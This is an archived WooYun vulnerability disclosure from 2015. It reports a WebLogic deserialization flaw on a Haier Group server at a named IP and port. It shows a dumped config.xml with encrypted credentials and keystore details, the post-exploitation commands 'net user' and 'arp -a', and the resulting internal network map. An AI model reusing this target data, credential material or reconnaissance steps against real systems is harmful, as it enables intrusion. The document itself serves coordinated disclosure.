乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-22: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-06: 细节向公众公开
海尔集团
http://27.223.70.77:7001/存在weblogic的反序列化漏洞可反弹shell
读取下配置信息D:\Oracle\Middleware\user_projects\domains\base_domain\config>type config.xml
type config.xml<?xml version='1.0' encoding='UTF-8'?><domain xmlns="http://xmlns.oracle.com/weblogic/domain" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd"> <name>base_domain</name> <domain-version>10.3.5.0</domain-version> <security-configuration> <name>base_domain</name> <realm> <sec:authentication-provider xsi:type="wls:default-authenticatorType"></sec:authentication-provider> <sec:authentication-provider xsi:type="wls:default-identity-asserterType"> <sec:active-type>AuthenticatedUser</sec:active-type> </sec:authentication-provider> <sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-role-mapperType"></sec:role-mapper> <sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-authorizerType"></sec:authorizer> <sec:adjudicator xsi:type="wls:default-adjudicatorType"></sec:adjudicator> <sec:credential-mapper xsi:type="wls:default-credential-mapperType"></sec:credential-mapper> <sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType"></sec:cert-path-provider> <sec:cert-path-builder>WebLogicCertPathProvider</sec:cert-path-builder> <sec:name>myrealm</sec:name> <sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator" xsi:type="pas:system-password-validatorType"> <sec:name>SystemPasswordValidator</sec:name> <pas:min-password-length>8</pas:min-password-length> <pas:min-numeric-or-special-characters>1</pas:min-numeric-or-special-characters> </sec:password-validator> </realm> <default-realm>myrealm</default-realm> <credential-encrypted>{AES}k77cNkchopQnD98Lk9bhatCSc8LYsOIPwQpBwD2IZ4GGFFkV2NWnNMNAG69CBoBpLK7gQa+WCOek6AfWNz6etTFe8A42os5QZQhevUwJVTqYBPcbP9JGDSjzq9+YOLOd</credential-encrypted> <node-manager-username>kXRx0qV8Ci</node-manager-username> <node-manager-password-encrypted>{AES}rBvG0C6Lqyj+i1tVEsjg1uRLlZA0FxVOBNPPT0mzHbI=</node-manager-password-encrypted> </security-configuration> <server> <name>AdminServer</name> <ssl> <server-private-key-alias>weblogic</server-private-key-alias> <server-private-key-pass-phrase-encrypted>{AES}gI07Nk70oXtmsbc9eRoE1GEiFoeioTtTZzTdfamsiy0=</server-private-key-pass-phrase-encrypted> </ssl> <listen-address></listen-address> <key-stores>DemoIdentityAndDemoTrust</key-stores> <custom-identity-key-store-file-name>D:\Oracle\MIDDLE~1\WLSERV~1.3\server\lib\DemoIdentity.jks</custom-identity-key-store-file-name> <custom-identity-key-store-type>jks</custom-identity-key-store-type> <custom-identity-key-store-pass-phrase-encrypted>{AES}WJ4ttnQJEBtkpWAkO+MUDJmreWP0GIxLLoP1htB22kI=</custom-identity-key-store-pass-phrase-encrypted> <custom-trust-key-store-file-name>D:\Oracle\Middleware\user_projects\domains\base_domain\jpushJks1.jks</custom-trust-key-store-file-name> <custom-trust-key-store-type>jks</custom-trust-key-store-type> <custom-trust-key-store-pass-phrase-encrypted>{AES}wd3BUY+mB9X7NC4wCcfmI6mFnkRgtbCq0vCYTL3heLA=</custom-trust-key-store-pass-phrase-encrypted> </server> <production-mode-enabled>true</production-mode-enabled> <embedded-ldap> <name>base_domain</name> <credential-encrypted>{AES}pbAo/PlhkYvUI6OQFrA89rodZK09WpCs+EeP04TAVbg0xr0eDQ8xqy0+RfmIwu/5</credential-encrypted> </embedded-ldap> <configuration-version>10.3.5.0</configuration-version> <app-deployment> <name>sales</name> <target>AdminServer</target> <module-type>war</module-type> <source-path>servers\AdminServer\upload\sales.war</source-path> <security-dd-model>DDOnly</security-dd-model> </app-deployment> <app-deployment> <name>dkt</name> <target>AdminServer</target> <module-type>war</module-type> <source-path>servers\AdminServer\upload\dkt.war</source-path> <security-dd-model>DDOnly</security-dd-model> </app-deployment> <admin-server-name>AdminServer</admin-server-name></domain>
net user
arp -a
arp -a½ӿغ 10.135.108.217 --- 0xb Internet µٖ· ϯmµٖ· `э 10.135.108.1 00-26-52-b3-9a-45 ¶¯̬ 10.135.108.10 d8-9d-67-26-54-44 ¶¯̬ 10.135.108.11 d8-9d-67-2b-7b-34 ¶¯̬ 10.135.108.90 00-50-56-a3-75-1f ¶¯̬ 10.135.108.94 00-50-56-a3-09-e8 ¶¯̬ 10.135.108.111 00-50-56-a3-35-3c ¶¯̬ 10.135.108.146 00-50-56-a3-0e-8f ¶¯̬ 10.135.108.181 00-50-56-a3-79-8e ¶¯̬ 10.135.108.188 00-50-56-a3-47-94 ¶¯̬ 10.135.108.197 00-50-56-a3-37-b3 ¶¯̬ 10.135.108.221 00-50-56-a3-6e-ae ¶¯̬ 10.135.108.232 00-50-56-a3-45-3f ¶¯̬ 10.135.108.255 ff-ff-ff-ff-ff-ff ¾²̬ 224.0.0.22 01-00-5e-00-00-16 ¾²̬ 224.0.0.252 01-00-5e-00-00-fc ¾²̬ 239.255.255.250 01-00-5e-7f-ff-fa ¾²̬
升级
危害等级:高
漏洞Rank:15
确认时间:2015-12-24 09:07
感谢白帽子的测试与提醒,已安排人员进行处理。
暂无